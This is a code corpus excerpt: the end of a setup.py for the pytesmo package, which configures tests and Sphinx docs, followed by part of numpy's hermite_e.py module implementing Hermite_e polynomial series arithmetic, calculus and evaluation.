if self.cov_xml:
self.cov.extend(["--cov-report", "xml"])
if self.cov_html:
self.cov.extend(["--cov-report", "html"])
if self.junitxml is not None:
self.junitxml = ["--junitxml", self.junitxml]
def run_tests(self):
try:
import pytest
except:
raise RuntimeError("py.test is not installed, "
"run: pip install pytest")
params = {"args": self.test_args}
if self.cov:
params["args"] += self.cov
params["plugins"] = ["cov"]
if self.junitxml:
params["args"] += self.junitxml
errno = pytest.main(**params)
sys.exit(errno)
def sphinx_builder():
try:
from sphinx.setup_command import BuildDoc
except ImportError:
class NoSphinx(Command):
user_options = []
def initialize_options(self):
raise RuntimeError("Sphinx documentation is not installed, "
"run: pip install sphinx")
return NoSphinx
class BuildSphinxDocs(BuildDoc):
def run(self):
if self.builder == "doctest":
import sphinx.ext.doctest as doctest
# Capture the DocTestBuilder class in order to return the total
# number of failures when exiting
ref = capture_objs(doctest.DocTestBuilder)
BuildDoc.run(self)
errno = ref[-1].total_failures
sys.exit(errno)
else:
BuildDoc.run(self)
return BuildSphinxDocs
class ObjKeeper(type):
instances = {}
def __init__(cls, name, bases, dct):
cls.instances[cls] = []
def __call__(cls, *args, **kwargs):
cls.instances[cls].append(super(ObjKeeper, cls).__call__(*args,
**kwargs))
return cls.instances[cls][-1]
def capture_objs(cls):
from six import add_metaclass
module = inspect.getmodule(cls)
name = cls.__name__
keeper_class = add_metaclass(ObjKeeper)(cls)
setattr(module, name, keeper_class)
cls = getattr(module, name)
return keeper_class.instances[cls]
def get_install_requirements(path):
content = open(os.path.join(__location__, path)).read()
return [req for req in content.splitlines() if req != '']
def read(fname):
return open(os.path.join(__location__, fname)).read()
def setup_package():
# Assemble additional setup commands
cmdclass = versioneer.get_cmdclass()
cmdclass['docs'] = sphinx_builder()
cmdclass['doctest'] = sphinx_builder()
cmdclass['test'] = PyTest
cmdclass['cythonize'] = Cythonize
cmdclass['build_ext'] = NumpyBuildExt
# Some helper variables
version = versioneer.get_version()
docs_path = os.path.join(__location__, "docs")
docs_build_path = os.path.join(docs_path, "_build")
install_reqs = get_install_requirements("requirements.txt")
command_options = {
'docs': {'project': ('setup.py', MAIN_PACKAGE),
'version': ('setup.py', version.split('-', 1)[0]),
'release': ('setup.py', version),
'build_dir': ('setup.py', docs_build_path),
'config_dir': ('setup.py', docs_path),
'source_dir': ('setup.py', docs_path)},
'doctest': {'project': ('setup.py', MAIN_PACKAGE),
'version': ('setup.py', version.split('-', 1)[0]),
'release': ('setup.py', version),
'build_dir': ('setup.py', docs_build_path),
'config_dir': ('setup.py', docs_path),
'source_dir': ('setup.py', docs_path),
'builder': ('setup.py', 'doctest')},
'test': {'test_suite': ('setup.py', 'tests'),
'cov': ('setup.py', 'pytesmo')}}
if JUNIT_XML:
command_options['test']['junitxml'] = ('setup.py', 'junit.xml')
if COVERAGE_XML:
command_options['test']['cov_xml'] = ('setup.py', True)
if COVERAGE_HTML:
command_options['test']['cov_html'] = ('setup.py', True)
setup(name=MAIN_PACKAGE,
version=version,
url=URL,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
license=LICENSE,
long_description=read('README.rst'),
classifiers=CLASSIFIERS,
test_suite='tests',
packages=setuptools.find_packages(exclude=['tests', 'tests.*']),
ext_modules=ext_modules,
package_data={'pytesmo': [os.path.join('colormaps', '*.cmap')],
},
install_requires=install_reqs,
setup_requires=['six'],
cmdclass=cmdclass,
tests_require=['pytest-cov', 'pytest'],
command_options=command_options,
entry_points={'console_scripts': CONSOLE_SCRIPTS})
if __name__ == "__main__":
setup_package()
| bsd-3-clause |
dimasad/numpy | numpy/polynomial/hermite_e.py | 49 | 57120 | """
Objects for dealing with Hermite_e series.
This module provides a number of objects (mostly functions) useful for
dealing with Hermite_e series, including a `HermiteE` class that
encapsulates the usual arithmetic operations. (General information
on how this module represents and works with such polynomials is in the
docstring for its "parent" sub-package, `numpy.polynomial`).
Constants
---------
- `hermedomain` -- Hermite_e series default domain, [-1,1].
- `hermezero` -- Hermite_e series that evaluates identically to 0.
- `hermeone` -- Hermite_e series that evaluates identically to 1.
- `hermex` -- Hermite_e series for the identity map, ``f(x) = x``.
Arithmetic
----------
- `hermemulx` -- multiply a Hermite_e series in ``P_i(x)`` by ``x``.
- `hermeadd` -- add two Hermite_e series.
- `hermesub` -- subtract one Hermite_e series from another.
- `hermemul` -- multiply two Hermite_e series.
- `hermediv` -- divide one Hermite_e series by another.
- `hermeval` -- evaluate a Hermite_e series at given points.
- `hermeval2d` -- evaluate a 2D Hermite_e series at given points.
- `hermeval3d` -- evaluate a 3D Hermite_e series at given points.
- `hermegrid2d` -- evaluate a 2D Hermite_e series on a Cartesian product.
- `hermegrid3d` -- evaluate a 3D Hermite_e series on a Cartesian product.
Calculus
--------
- `hermeder` -- differentiate a Hermite_e series.
- `hermeint` -- integrate a Hermite_e series.
Misc Functions
--------------
- `hermefromroots` -- create a Hermite_e series with specified roots.
- `hermeroots` -- find the roots of a Hermite_e series.
- `hermevander` -- Vandermonde-like matrix for Hermite_e polynomials.
- `hermevander2d` -- Vandermonde-like matrix for 2D power series.
- `hermevander3d` -- Vandermonde-like matrix for 3D power series.
- `hermegauss` -- Gauss-Hermite_e quadrature, points and weights.
- `hermeweight` -- Hermite_e weight function.
- `hermecompanion` -- symmetrized companion matrix in Hermite_e form.
- `hermefit` -- least-squares fit returning a Hermite_e series.
- `hermetrim` -- trim leading coefficients from a Hermite_e series.
- `hermeline` -- Hermite_e series of given straight line.
- `herme2poly` -- convert a Hermite_e series to a polynomial.
- `poly2herme` -- convert a polynomial to a Hermite_e series.
Classes
-------
- `HermiteE` -- A Hermite_e series class.
See also
--------
`numpy.polynomial`
"""
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
import numpy.linalg as la
from . import polyutils as pu
from ._polybase import ABCPolyBase
__all__ = [
'hermezero', 'hermeone', 'hermex', 'hermedomain', 'hermeline',
'hermeadd', 'hermesub', 'hermemulx', 'hermemul', 'hermediv',
'hermepow', 'hermeval', 'hermeder', 'hermeint', 'herme2poly',
'poly2herme', 'hermefromroots', 'hermevander', 'hermefit', 'hermetrim',
'hermeroots', 'HermiteE', 'hermeval2d', 'hermeval3d', 'hermegrid2d',
'hermegrid3d', 'hermevander2d', 'hermevander3d', 'hermecompanion',
'hermegauss', 'hermeweight']
hermetrim = pu.trimcoef
def poly2herme(pol):
"""
poly2herme(pol)
Convert a polynomial to a Hermite series.
Convert an array representing the coefficients of a polynomial (relative
to the "standard" basis) ordered from lowest degree to highest, to an
array of the coefficients of the equivalent Hermite series, ordered
from lowest to highest degree.
Parameters
----------
pol : array_like
1-D array containing the polynomial coefficients
Returns
-------
c : ndarray
1-D array containing the coefficients of the equivalent Hermite
series.
See Also
--------
herme2poly
Notes
-----
The easy way to do conversions between polynomial basis sets
is to use the convert method of a class instance.
Examples
--------
>>> from numpy.polynomial.hermite_e import poly2herme
>>> poly2herme(np.arange(4))
array([ 2., 10., 2., 3.])
"""
[pol] = pu.as_series([pol])
deg = len(pol) - 1
res = 0
for i in range(deg, -1, -1):
res = hermeadd(hermemulx(res), pol[i])
return res
def herme2poly(c):
"""
Convert a Hermite series to a polynomial.
Convert an array representing the coefficients of a Hermite series,
ordered from lowest degree to highest, to an array of the coefficients
of the equivalent polynomial (relative to the "standard" basis) ordered
from lowest to highest degree.
Parameters
----------
c : array_like
1-D array containing the Hermite series coefficients, ordered
from lowest order term to highest.
Returns
-------
pol : ndarray
1-D array containing the coefficients of the equivalent polynomial
(relative to the "standard" basis) ordered from lowest order term
to highest.
See Also
--------
poly2herme
Notes
-----
The easy way to do conversions between polynomial basis sets
is to use the convert method of a class instance.
Examples
--------
>>> from numpy.polynomial.hermite_e import herme2poly
>>> herme2poly([ 2., 10., 2., 3.])
array([ 0., 1., 2., 3.])
"""
from .polynomial import polyadd, polysub, polymulx
[c] = pu.as_series([c])
n = len(c)
if n == 1:
return c
if n == 2:
return c
else:
c0 = c[-2]
c1 = c[-1]
# i is the current degree of c1
for i in range(n - 1, 1, -1):
tmp = c0
c0 = polysub(c[i - 2], c1*(i - 1))
c1 = polyadd(tmp, polymulx(c1))
return polyadd(c0, polymulx(c1))
#
# These are constant arrays are of integer type so as to be compatible
# with the widest range of other types, such as Decimal.
#
# Hermite
hermedomain = np.array([-1, 1])
# Hermite coefficients representing zero.
hermezero = np.array([0])
# Hermite coefficients representing one.
hermeone = np.array([1])
# Hermite coefficients representing the identity x.
hermex = np.array([0, 1])
def hermeline(off, scl):
"""
Hermite series whose graph is a straight line.
Parameters
----------
off, scl : scalars
The specified line is given by ``off + scl*x``.
Returns
-------
y : ndarray
This module's representation of the Hermite series for
``off + scl*x``.
See Also
--------
polyline, chebline
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeline
>>> from numpy.polynomial.hermite_e import hermeline, hermeval
>>> hermeval(0,hermeline(3, 2))
3.0
>>> hermeval(1,hermeline(3, 2))
5.0
"""
if scl != 0:
return np.array([off, scl])
else:
return np.array([off])
def hermefromroots(roots):
"""
Generate a HermiteE series with given roots.
The function returns the coefficients of the polynomial
.. math:: p(x) = (x - r_0) * (x - r_1) * ... * (x - r_n),
in HermiteE form, where the `r_n` are the roots specified in `roots`.
If a zero has multiplicity n, then it must appear in `roots` n times.
For instance, if 2 is a root of multiplicity three and 3 is a root of
multiplicity 2, then `roots` looks something like [2, 2, 2, 3, 3]. The
roots can appear in any order.
If the returned coefficients are `c`, then
.. math:: p(x) = c_0 + c_1 * He_1(x) + ... + c_n * He_n(x)
The coefficient of the last term is not generally 1 for monic
polynomials in HermiteE form.
Parameters
----------
roots : array_like
Sequence containing the roots.
Returns
-------
out : ndarray
1-D array of coefficients. If all roots are real then `out` is a
real array, if some of the roots are complex, then `out` is complex
even if all the coefficients in the result are real (see Examples
below).
See Also
--------
polyfromroots, legfromroots, lagfromroots, hermfromroots,
chebfromroots.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermefromroots, hermeval
>>> coef = hermefromroots((-1, 0, 1))
>>> hermeval((-1, 0, 1), coef)
array([ 0., 0., 0.])
>>> coef = hermefromroots((-1j, 1j))
>>> hermeval((-1j, 1j), coef)
array([ 0.+0.j, 0.+0.j])
"""
if len(roots) == 0:
return np.ones(1)
else:
[roots] = pu.as_series([roots], trim=False)
roots.sort()
p = [hermeline(-r, 1) for r in roots]
n = len(p)
while n > 1:
m, r = divmod(n, 2)
tmp = [hermemul(p[i], p[i+m]) for i in range(m)]
if r:
tmp[0] = hermemul(tmp[0], p[-1])
p = tmp
n = m
return p[0]
def hermeadd(c1, c2):
"""
Add one Hermite series to another.
Returns the sum of two Hermite series `c1` + `c2`. The arguments
are sequences of coefficients ordered from lowest order term to
highest, i.e., [1,2,3] represents the series ``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Array representing the Hermite series of their sum.
See Also
--------
hermesub, hermemul, hermediv, hermepow
Notes
-----
Unlike multiplication, division, etc., the sum of two Hermite series
is a Hermite series (without having to "reproject" the result onto
the basis set) so addition, just like that of "standard" polynomials,
is simply "component-wise."
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeadd
>>> hermeadd([1, 2, 3], [1, 2, 3, 4])
array([ 2., 4., 6., 4.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2):
c1[:c2.size] += c2
ret = c1
else:
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def hermesub(c1, c2):
"""
Subtract one Hermite series from another.
Returns the difference of two Hermite series `c1` - `c2`. The
sequences of coefficients are from lowest order term to highest, i.e.,
[1,2,3] represents the series ``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Of Hermite series coefficients representing their difference.
See Also
--------
hermeadd, hermemul, hermediv, hermepow
Notes
-----
Unlike multiplication, division, etc., the difference of two Hermite
series is a Hermite series (without having to "reproject" the result
onto the basis set) so subtraction, just like that of "standard"
polynomials, is simply "component-wise."
Examples
--------
>>> from numpy.polynomial.hermite_e import hermesub
>>> hermesub([1, 2, 3, 4], [1, 2, 3])
array([ 0., 0., 0., 4.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2):
c1[:c2.size] -= c2
ret = c1
else:
c2 = -c2
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def hermemulx(c):
"""Multiply a Hermite series by x.
Multiply the Hermite series `c` by x, where x is the independent
variable.
Parameters
----------
c : array_like
1-D array of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Array representing the result of the multiplication.
Notes
-----
The multiplication uses the recursion relationship for Hermite
polynomials in the form
.. math::
xP_i(x) = (P_{i + 1}(x) + iP_{i - 1}(x)))
Examples
--------
>>> from numpy.polynomial.hermite_e import hermemulx
>>> hermemulx([1, 2, 3])
array([ 2., 7., 2., 3.])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
# The zero series needs special treatment
if len(c) == 1 and c[0] == 0:
return c
prd = np.empty(len(c) + 1, dtype=c.dtype)
prd[0] = c[0]*0
prd[1] = c[0]
for i in range(1, len(c)):
prd[i + 1] = c[i]
prd[i - 1] += c[i]*i
return prd
def hermemul(c1, c2):
"""
Multiply one Hermite series by another.
Returns the product of two Hermite series `c1` * `c2`. The arguments
are sequences of coefficients, from lowest order "term" to highest,
e.g., [1,2,3] represents the series ``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Of Hermite series coefficients representing their product.
See Also
--------
hermeadd, hermesub, hermediv, hermepow
Notes
-----
In general, the (polynomial) product of two C-series results in terms
that are not in the Hermite polynomial basis set. Thus, to express
the product as a Hermite series, it is necessary to "reproject" the
product onto said basis set, which may produce "unintuitive" (but
correct) results; see Examples section below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermemul
>>> hermemul([1, 2, 3], [0, 1, 2])
array([ 14., 15., 28., 7., 6.])
"""
# s1, s2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2):
c = c2
xs = c1
else:
c = c1
xs = c2
if len(c) == 1:
c0 = c[0]*xs
c1 = 0
elif len(c) == 2:
c0 = c[0]*xs
c1 = c[1]*xs
else:
nd = len(c)
c0 = c[-2]*xs
c1 = c[-1]*xs
for i in range(3, len(c) + 1):
tmp = c0
nd = nd - 1
c0 = hermesub(c[-i]*xs, c1*(nd - 1))
c1 = hermeadd(tmp, hermemulx(c1))
return hermeadd(c0, hermemulx(c1))
def hermediv(c1, c2):
"""
Divide one Hermite series by another.
Returns the quotient-with-remainder of two Hermite series
`c1` / `c2`. The arguments are sequences of coefficients from lowest
order "term" to highest, e.g., [1,2,3] represents the series
``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
[quo, rem] : ndarrays
Of Hermite series coefficients representing the quotient and
remainder.
See Also
--------
hermeadd, hermesub, hermemul, hermepow
Notes
-----
In general, the (polynomial) division of one Hermite series by another
results in quotient and remainder terms that are not in the Hermite
polynomial basis set. Thus, to express these results as a Hermite
series, it is necessary to "reproject" the results onto the Hermite
basis set, which may produce "unintuitive" (but correct) results; see
Examples section below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermediv
>>> hermediv([ 14., 15., 28., 7., 6.], [0, 1, 2])
(array([ 1., 2., 3.]), array([ 0.]))
>>> hermediv([ 15., 17., 28., 7., 6.], [0, 1, 2])
(array([ 1., 2., 3.]), array([ 1., 2.]))
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if c2[-1] == 0:
raise ZeroDivisionError()
lc1 = len(c1)
lc2 = len(c2)
if lc1 < lc2:
return c1[:1]*0, c1
elif lc2 == 1:
return c1/c2[-1], c1[:1]*0
else:
quo = np.empty(lc1 - lc2 + 1, dtype=c1.dtype)
rem = c1
for i in range(lc1 - lc2, - 1, -1):
p = hermemul([0]*i + [1], c2)
q = rem[-1]/p[-1]
rem = rem[:-1] - q*p[:-1]
quo[i] = q
return quo, pu.trimseq(rem)
def hermepow(c, pow, maxpower=16):
"""Raise a Hermite series to a power.
Returns the Hermite series `c` raised to the power `pow`. The
argument `c` is a sequence of coefficients ordered from low to high.
i.e., [1,2,3] is the series ``P_0 + 2*P_1 + 3*P_2.``
Parameters
----------
c : array_like
1-D array of Hermite series coefficients ordered from low to
high.
pow : integer
Power to which the series will be raised
maxpower : integer, optional
Maximum power allowed. This is mainly to limit growth of the series
to unmanageable size. Default is 16
Returns
-------
coef : ndarray
Hermite series of power.
See Also
--------
hermeadd, hermesub, hermemul, hermediv
Examples
--------
>>> from numpy.polynomial.hermite_e import hermepow
>>> hermepow([1, 2, 3], 2)
array([ 23., 28., 46., 12., 9.])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
power = int(pow)
if power != pow or power < 0:
raise ValueError("Power must be a non-negative integer.")
elif maxpower is not None and power > maxpower:
raise ValueError("Power is too large")
elif power == 0:
return np.array([1], dtype=c.dtype)
elif power == 1:
return c
else:
# This can be made more efficient by using powers of two
# in the usual way.
prd = c
for i in range(2, power + 1):
prd = hermemul(prd, c)
return prd
def hermeder(c, m=1, scl=1, axis=0):
"""
Differentiate a Hermite_e series.
Returns the series coefficients `c` differentiated `m` times along
`axis`. At each iteration the result is multiplied by `scl` (the
scaling factor is for use in a linear change of variable). The argument
`c` is an array of coefficients from low to high degree along each
axis, e.g., [1,2,3] represents the series ``1*He_0 + 2*He_1 + 3*He_2``
while [[1,2],[1,2]] represents ``1*He_0(x)*He_0(y) + 1*He_1(x)*He_0(y)
+ 2*He_0(x)*He_1(y) + 2*He_1(x)*He_1(y)`` if axis=0 is ``x`` and axis=1
is ``y``.
Parameters
----------
c : array_like
Array of Hermite_e series coefficients. If `c` is multidimensional
the different axis correspond to different variables with the
degree in each axis given by the corresponding index.
m : int, optional
Number of derivatives taken, must be non-negative. (Default: 1)
scl : scalar, optional
Each differentiation is multiplied by `scl`. The end result is
multiplication by ``scl**m``. This is for use in a linear change of
variable. (Default: 1)
axis : int, optional
Axis over which the derivative is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
der : ndarray
Hermite series of the derivative.
See Also
--------
hermeint
Notes
-----
In general, the result of differentiating a Hermite series does not
resemble the same operation on a power series. Thus the result of this
function may be "unintuitive," albeit correct; see Examples section
below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeder
>>> hermeder([ 1., 1., 1., 1.])
array([ 1., 2., 3.])
>>> hermeder([-0.25, 1., 1./2., 1./3., 1./4 ], m=2)
array([ 1., 2., 3.])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
c = c.astype(np.double)
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of derivation must be integer")
if cnt < 0:
raise ValueError("The order of derivation must be non-negative")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
c = np.rollaxis(c, iaxis)
n = len(c)
if cnt >= n:
return c[:1]*0
else:
for i in range(cnt):
n = n - 1
c *= scl
der = np.empty((n,) + c.shape[1:], dtype=c.dtype)
for j in range(n, 0, -1):
der[j - 1] = j*c[j]
c = der
c = np.rollaxis(c, 0, iaxis + 1)
return c
def hermeint(c, m=1, k=[], lbnd=0, scl=1, axis=0):
"""
Integrate a Hermite_e series.
Returns the Hermite_e series coefficients `c` integrated `m` times from
`lbnd` along `axis`. At each iteration the resulting series is
**multiplied** by `scl` and an integration constant, `k`, is added.
The scaling factor is for use in a linear change of variable. ("Buyer
beware": note that, depending on what one is doing, one may want `scl`
to be the reciprocal of what one might expect; for more information,
see the Notes section below.) The argument `c` is an array of
coefficients from low to high degree along each axis, e.g., [1,2,3]
represents the series ``H_0 + 2*H_1 + 3*H_2`` while [[1,2],[1,2]]
represents ``1*H_0(x)*H_0(y) + 1*H_1(x)*H_0(y) + 2*H_0(x)*H_1(y) +
2*H_1(x)*H_1(y)`` if axis=0 is ``x`` and axis=1 is ``y``.
Parameters
----------
c : array_like
Array of Hermite_e series coefficients. If c is multidimensional
the different axis correspond to different variables with the
degree in each axis given by the corresponding index.
m : int, optional
Order of integration, must be positive. (Default: 1)
k : {[], list, scalar}, optional
Integration constant(s). The value of the first integral at
``lbnd`` is the first value in the list, the value of the second
integral at ``lbnd`` is the second value, etc. If ``k == []`` (the
default), all constants are set to zero. If ``m == 1``, a single
scalar can be given instead of a list.
lbnd : scalar, optional
The lower bound of the integral. (Default: 0)
scl : scalar, optional
Following each integration the result is *multiplied* by `scl`
before the integration constant is added. (Default: 1)
axis : int, optional
Axis over which the integral is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
S : ndarray
Hermite_e series coefficients of the integral.
Raises
------
ValueError
If ``m < 0``, ``len(k) > m``, ``np.isscalar(lbnd) == False``, or
``np.isscalar(scl) == False``.
See Also
--------
hermeder
Notes
-----
Note that the result of each integration is *multiplied* by `scl`.
Why is this important to note? Say one is making a linear change of
variable :math:`u = ax + b` in an integral relative to `x`. Then
.. math::`dx = du/a`, so one will need to set `scl` equal to
:math:`1/a` - perhaps not what one would have first thought.
Also note that, in general, the result of integrating a C-series needs
to be "reprojected" onto the C-series basis set. Thus, typically,
the result of this function is "unintuitive," albeit correct; see
Examples section below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeint
>>> hermeint([1, 2, 3]) # integrate once, value 0 at 0.
array([ 1., 1., 1., 1.])
>>> hermeint([1, 2, 3], m=2) # integrate twice, value & deriv 0 at 0
array([-0.25 , 1. , 0.5 , 0.33333333, 0.25 ])
>>> hermeint([1, 2, 3], k=1) # integrate once, value 1 at 0.
array([ 2., 1., 1., 1.])
>>> hermeint([1, 2, 3], lbnd=-1) # integrate once, value 0 at -1
array([-1., 1., 1., 1.])
>>> hermeint([1, 2, 3], m=2, k=[1, 2], lbnd=-1)
array([ 1.83333333, 0. , 0.5 , 0.33333333, 0.25 ])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
c = c.astype(np.double)
if not np.iterable(k):
k = [k]
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of integration must be integer")
if cnt < 0:
raise ValueError("The order of integration must be non-negative")
if len(k) > cnt:
raise ValueError("Too many integration constants")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
c = np.rollaxis(c, iaxis)
k = list(k) + [0]*(cnt - len(k))
for i in range(cnt):
n = len(c)
c *= scl
if n == 1 and np.all(c[0] == 0):
c[0] += k[i]
else:
tmp = np.empty((n + 1,) + c.shape[1:], dtype=c.dtype)
tmp[0] = c[0]*0
tmp[1] = c[0]
for j in range(1, n):
tmp[j + 1] = c[j]/(j + 1)
tmp[0] += k[i] - hermeval(lbnd, tmp)
c = tmp
c = np.rollaxis(c, 0, iaxis + 1)
return c
def hermeval(x, c, tensor=True):
"""
Evaluate an HermiteE series at points x.
If `c` is of length `n + 1`, this function returns the value:
.. math:: p(x) = c_0 * He_0(x) + c_1 * He_1(x) + ... + c_n * He_n(x)
The parameter `x` is converted to an array only if it is a tuple or a
list, otherwise it is treated as a scalar. In either case, either `x`
or its elements must support multiplication and addition both with
themselves and with the elements of `c`.
If `c` is a 1-D array, then `p(x)` will have the same shape as `x`. If
`c` is multidimensional, then the shape of the result depends on the
value of `tensor`. If `tensor` is true the shape will be c.shape[1:] +
x.shape. If `tensor` is false the shape will be c.shape[1:]. Note that
scalars have shape (,).
Trailing zeros in the coefficients will be used in the evaluation, so
they should be avoided if efficiency is a concern.
Parameters
----------
x : array_like, compatible object
If `x` is a list or tuple, it is converted to an ndarray, otherwise
it is left unchanged and treated as a scalar. In either case, `x`
or its elements must support addition and multiplication with
with themselves and with the elements of `c`.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree n are contained in c[n]. If `c` is multidimensional the
remaining indices enumerate multiple polynomials. In the two
dimensional case the coefficients may be thought of as stored in
the columns of `c`.
tensor : boolean, optional
If True, the shape of the coefficient array is extended with ones
on the right, one for each dimension of `x`. Scalars have dimension 0
for this action. The result is that every column of coefficients in
`c` is evaluated for every element of `x`. If False, `x` is broadcast
over the columns of `c` for the evaluation. This keyword is useful
when `c` is multidimensional. The default value is True.
.. versionadded:: 1.7.0
Returns
-------
values : ndarray, algebra_like
The shape of the return value is described above.
See Also
--------
hermeval2d, hermegrid2d, hermeval3d, hermegrid3d
Notes
-----
The evaluation uses Clenshaw recursion, aka synthetic division.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeval
>>> coef = [1,2,3]
>>> hermeval(1, coef)
3.0
>>> hermeval([[1,2],[3,4]], coef)
array([[ 3., 14.],
[ 31., 54.]])
"""
c = np.array(c, ndmin=1, copy=0)
if c.dtype.char in '?bBhHiIlLqQpP':
c = c.astype(np.double)
if isinstance(x, (tuple, list)):
x = np.asarray(x)
if isinstance(x, np.ndarray) and tensor:
c = c.reshape(c.shape + (1,)*x.ndim)
if len(c) == 1:
c0 = c[0]
c1 = 0
elif len(c) == 2:
c0 = c[0]
c1 = c[1]
else:
nd = len(c)
c0 = c[-2]
c1 = c[-1]
for i in range(3, len(c) + 1):
tmp = c0
nd = nd - 1
c0 = c[-i] - c1*(nd - 1)
c1 = tmp + c1*x
return c0 + c1*x
def hermeval2d(x, y, c):
"""
Evaluate a 2-D HermiteE series at points (x, y).
This function returns the values:
.. math:: p(x,y) = \\sum_{i,j} c_{i,j} * He_i(x) * He_j(y)
The parameters `x` and `y` are converted to arrays only if they are
tuples or a lists, otherwise they are treated as a scalars and they
must have the same shape after conversion. In either case, either `x`
and `y` or their elements must support multiplication and addition both
with themselves and with the elements of `c`.
If `c` is a 1-D array a one is implicitly appended to its shape to make
it 2-D. The shape of the result will be c.shape[2:] + x.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points `(x, y)`,
where `x` and `y` must have the same shape. If `x` or `y` is a list
or tuple, it is first converted to an ndarray, otherwise it is left
unchanged and if it isn't an ndarray it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term
of multi-degree i,j is contained in ``c[i,j]``. If `c` has
dimension greater than two the remaining indices enumerate multiple
sets of coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points formed with
pairs of corresponding values from `x` and `y`.
See Also
--------
hermeval, hermegrid2d, hermeval3d, hermegrid3d
Notes
-----
.. versionadded::1.7.0
"""
try:
x, y = np.array((x, y), copy=0)
except:
raise ValueError('x, y are incompatible')
c = hermeval(x, c)
c = hermeval(y, c, tensor=False)
return c
def hermegrid2d(x, y, c):
"""
Evaluate a 2-D HermiteE series on the Cartesian product of x and y.
This function returns the values:
.. math:: p(a,b) = \sum_{i,j} c_{i,j} * H_i(a) * H_j(b)
where the points `(a, b)` consist of all pairs formed by taking
`a` from `x` and `b` from `y`. The resulting points form a grid with
`x` in the first dimension and `y` in the second.
The parameters `x` and `y` are converted to arrays only if they are
tuples or a lists, otherwise they are treated as a scalars. In either
case, either `x` and `y` or their elements must support multiplication
and addition both with themselves and with the elements of `c`.
If `c` has fewer than two dimensions, ones are implicitly appended to
its shape to make it 2-D. The shape of the result will be c.shape[2:] +
x.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points in the
Cartesian product of `x` and `y`. If `x` or `y` is a list or
tuple, it is first converted to an ndarray, otherwise it is left
unchanged and, if it isn't an ndarray, it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree i,j are contained in ``c[i,j]``. If `c` has dimension
greater than two the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points in the Cartesian
product of `x` and `y`.
See Also
--------
hermeval, hermeval2d, hermeval3d, hermegrid3d
Notes
-----
.. versionadded::1.7.0
"""
c = hermeval(x, c)
c = hermeval(y, c)
return c
def hermeval3d(x, y, z, c):
"""
Evaluate a 3-D Hermite_e series at points (x, y, z).
This function returns the values:
.. math:: p(x,y,z) = \\sum_{i,j,k} c_{i,j,k} * He_i(x) * He_j(y) * He_k(z)
The parameters `x`, `y`, and `z` are converted to arrays only if
they are tuples or a lists, otherwise they are treated as a scalars and
they must have the same shape after conversion. In either case, either
`x`, `y`, and `z` or their elements must support multiplication and
addition both with themselves and with the elements of `c`.
If `c` has fewer than 3 dimensions, ones are implicitly appended to its
shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape.
Parameters
----------
x, y, z : array_like, compatible object
The three dimensional series is evaluated at the points
`(x, y, z)`, where `x`, `y`, and `z` must have the same shape. If
any of `x`, `y`, or `z` is a list or tuple, it is first converted
to an ndarray, otherwise it is left unchanged and if it isn't an
ndarray it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term of
multi-degree i,j,k is contained in ``c[i,j,k]``. If `c` has dimension
greater than 3 the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the multidimensional polynomial on points formed with
triples of corresponding values from `x`, `y`, and `z`.
See Also
--------
hermeval, hermeval2d, hermegrid2d, hermegrid3d
Notes
-----
.. versionadded::1.7.0
"""
try:
x, y, z = np.array((x, y, z), copy=0)
except:
raise ValueError('x, y, z are incompatible')
